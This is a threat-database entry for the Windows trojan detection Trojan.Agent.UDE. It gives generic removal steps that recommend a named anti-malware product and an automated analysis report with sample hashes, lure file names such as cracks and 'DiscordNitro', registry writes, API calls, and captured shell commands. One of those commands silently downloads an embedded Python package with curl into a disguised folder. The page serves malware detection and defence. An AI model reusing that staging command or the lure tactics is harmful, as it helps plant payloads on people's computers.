Threat Database Trojans Trojan.Agent.UDE

Trojan.Agent.UDE

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 26,635
Threat Level: 80 % (High)
Infected Computers: 3
First Seen: March 12, 2026
Last Seen: August 17, 2026
OS(es) Affected: Windows

The detection of Trojan.Agent.UDE on your system indicates a potential security threat that requires immediate attention. This type of malware is designed to compromise the security and integrity of your computer, and it's essential to understand its nature and how to remove it effectively.

What Is Trojan.Agent.UDE?

Trojan.Agent.UDE is a type of Trojan horse malware, which is a broad category of threats that disguise themselves as legitimate software to gain unauthorized access to a computer system. The name "Trojan.Agent.UDE" suggests that it is a detection name given by security software, indicating that it has been identified as a malicious agent. Trojan horses are known for their ability to evade detection by traditional antivirus programs, making them particularly dangerous.

How Trojan.Agent.UDE Operates

Once installed on a system, Trojan.Agent.UDE can operate in various ways, depending on its intended purpose. It may be designed to steal sensitive information, such as login credentials, credit card numbers, or personal data. It could also be used to download and install additional malware, create backdoors for remote access, or disrupt system operation. The specific actions of Trojan.Agent.UDE can vary, but its primary goal is to compromise the security and integrity of the infected computer.

Symptoms of Infection

Identifying a Trojan infection can be challenging, as these threats often operate silently in the background. However, some common symptoms may indicate the presence of malware like Trojan.Agent.UDE. These include unexpected system crashes, slow performance, unusual network activity, or the appearance of unwanted programs or toolbars. If you suspect that your system is infected, it's crucial to take immediate action to minimize potential damage.

How to Remove Trojan.Agent.UDE

  1. Boot your computer in Safe Mode with Networking to prevent the malware from loading and to allow for a more effective removal process.
  2. Use a reputable anti-malware tool, such as SpyHunter, to perform a full scan of your system. This will help identify and remove all components of the Trojan.
  3. Uninstall any suspicious programs or applications that you do not recognize or that were installed around the time the malware was detected.
  4. Reset your web browsers, including Chrome, Firefox, and Edge, to their default settings to remove any malicious extensions or settings changes made by the Trojan.
  5. Reboot your computer and perform another full scan with your anti-malware tool to ensure that all remnants of the malware have been removed.

Conclusion

Removing Trojan.Agent.UDE requires careful and thorough action to ensure that all components of the malware are eliminated from your system. By following the steps outlined above and maintaining good security practices, such as keeping your operating system and software up to date, using strong antivirus protection, and being cautious when downloading and installing software, you can help protect your computer from future threats. Remember, the key to dealing with malware is prompt action and a comprehensive removal approach to safeguard your digital security and privacy.

Analysis Report

General information

Family Name: Trojan.Agent.UDE
Signature status: No Signature

Known Samples

MD5: 142da947609a52c962be87aa4abab8a8
SHA1: c8ffbb4807ac7168df2c12b462e182404c0cc447
SHA256: C5C89438F9E34FBEC2C6F9C6B7DB5612FAD15C2902F851C92F74808217EFCABA
File Size: 1.06 MB, 1064448 bytes
MD5: 44b55a1c31fe935dc58b217f3dc9e248
SHA1: 6f78a68476834b637344b31d7f677566b33f724f
SHA256: A525F1FD1C657687686A03BB125F7136450B2F06ABAC036F6FD5F5430B660983
File Size: 729.09 KB, 729088 bytes
MD5: 2c768932e125bd22ea8b71a773053082
SHA1: 25968d28095d12ae3084b9675223d6785506f318
SHA256: 3D195BA1802309316A5A54031E76CC666136CC21E01B97DAF4A21A176EA5B3D3
File Size: 4.21 MB, 4212224 bytes
MD5: a688f0a4e7c8fa4b392300c9a41da9c8
SHA1: eaa977d09ed163b8592d1f8b43a1d34d721958de
SHA256: 936CE2B6C09B9292F40E31F6064A85AC1E33B6422EA293B3112C88670DBBED84
File Size: 283.14 KB, 283136 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have resources
  • File doesn't have security information
  • File has TLS information
  • File is 64-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
Show More
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Company Name RedLotus
File Description Redlotus
File Version
  • 10.0.19208
  • 1.0.0.0
Product Name
  • DiscordNitro
  • EldiaCordLauncher
  • RedLotusModAnalyzer
Product Version
  • 10.0.19208
  • 1.0.0.0

File Traits

  • HighEntropy
  • No Version Info
  • ntdll
  • x64

Block Information

Total Blocks: 54
Potentially Malicious Blocks: 43
Whitelisted Blocks: 10
Unknown Blocks: 1

Visual Map

0 ? x x x x x x x x 0 0 x x x x x x 0 x x x x x 0 x x x x x x x x x x x x x x x x x 0 0 0 x x x x x x 0 x 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Agent.UDE
  • Trojan.Agent.Gen.DFH

Files Modified

File Attributes
\device\namedpipe\msedge.crashpad_28541_2b8d Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\msedge.sync.27296.11241 Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\msedge.sync.46952.1091 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\0e7df2dd\exoduscrack.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\0e7df2dd\solara.bootstrapper.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\47b1c2dd\eldiacordlauncher.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\47b1c2dd\launcher_2.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\qwe900.log Generic Write,Read Attributes
c:\users\user\downloads\crash.log Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 n�8�tX�jg �� �v xy ����T������%����3bBx��#��$kF&� &�-(�(X�(�)E)�`*J*9*�"-!R0P%1�1HO5,]=�@V�A��B��G�IH[uH�pJ��N$N�O�`U_*X�\te_�zb"hc�wc�zh�ri��j�bk`k�ql(� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 隞놬﫥ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe n�q�,� RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtConnectPort
Show More
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRemoveIoCompletion
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetIoCompletion
  • ntdll.dll!NtSetSecurityObject
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForMultipleObjects
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • ntdll.dll!NtWriteVirtualMemory
  • ntdll.dll!NtYieldExecution
  • UNKNOWN
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
Cert Store Read
  • CertEnumCertificatesInStore
  • CertOpenSystemStore
Network Winsock
  • accept
  • bind
  • closesocket
  • connect
  • freeaddrinfo
  • getaddrinfo
  • getsockname
  • recv
  • send
  • setsockopt
Show More
  • socket
Network Winsock2
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
User Data Access
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserObjectInformation
Anti Debug
  • IsDebuggerPresent
Process Terminate
  • TerminateProcess

Shell Command Execution

C:\Users\Kjghvhzk\AppData\Local\Temp\47B1C2DD\EldiaCordLauncher.exe (NULL)
C:\Users\Kjghvhzk\AppData\Local\Temp\47B1C2DD\Launcher_2.exe (NULL)
"curl" "-k" "-L" "-s" "-o" "C:\Users\Kjghvhzk\AppData\Local\Microsoft\Windows\NtProfileIndex\python.zip.downloading" "https://www.python.org/ftp/python/3.12.7/python-3.12.7-embed-amd64.zip"
C:\Users\Ejgnlqgy\AppData\Local\Temp\0E7DF2DD\ExodusCrack.exe (NULL)
C:\Users\Ejgnlqgy\AppData\Local\Temp\0E7DF2DD\Solara.bootstrapper.exe (NULL)
Show More
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (NULL)
"curl" "-k" "-L" "-s" "-o" "C:\Users\Rsxabqng\AppData\Local\Microsoft\Windows\NtProfileIndex\python.zip.downloading" "https://www.python.org/ftp/python/3.12.7/python-3.12.7-embed-amd64.zip"